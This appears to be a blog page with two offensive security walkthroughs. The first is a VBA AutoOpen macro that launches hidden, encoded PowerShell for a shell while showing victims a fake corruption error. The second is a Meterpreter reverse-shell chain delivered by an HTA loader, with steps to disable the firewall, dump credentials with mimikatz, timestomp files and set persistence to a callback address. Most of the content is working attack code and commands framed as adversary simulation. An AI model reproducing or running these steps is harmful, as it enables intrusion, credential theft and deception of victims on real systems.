Goal:
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that. The full script is as follows: Sub AutoOpen() Dim x x = "-window hidden -EncodedCommand " <Base64'ed command>" Shell ("powershell.exe " & x) Dim title As String title = "Critical Microsoft Office Error" Dim msg As String Dim intResponse As Integer msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup." intResponse = MsgBox(msg, 16, title) Application.Quit End Sub Attacker's View:
0 Comments
Goal:
Simulate a sophisticated adversary by leveraging a compromised website hosting a zip archive via iframe with .hta loader with the PowerShell invocation leading to Meterpreter Reverse TCP Shell. Steps: Ø python unicorn.py windows/meterpreter/reverse_tcp hta (credits to Dave Kennedy) Ø host the .hta loader with the encoded Powershell Ø msfconsole – r unicorn.rb Ø meterpreter shell o getsid o getuid o migrate o getsystem o run checkvm o exploit Windows7 Service Pack 1 msp o use incognito o run countermeasure o run countermeasure –d –k o shell § netsh firewall set opmode disable //disable firewall o run vnc o load mimikatz o ls o upload /home/sathish/mimikatz.exe C:\\ o timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe" o shell o mimikatz.exe § privilege::debug § inject::process lsass.exe sekurlsa.dll § getLogonPasswords § sekurlsa::logonPasswords full o run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196 § attrib +h c:\autoexec.bat //make it hidden |
AuthorVitali Kremez Archives
September 2016
Categories |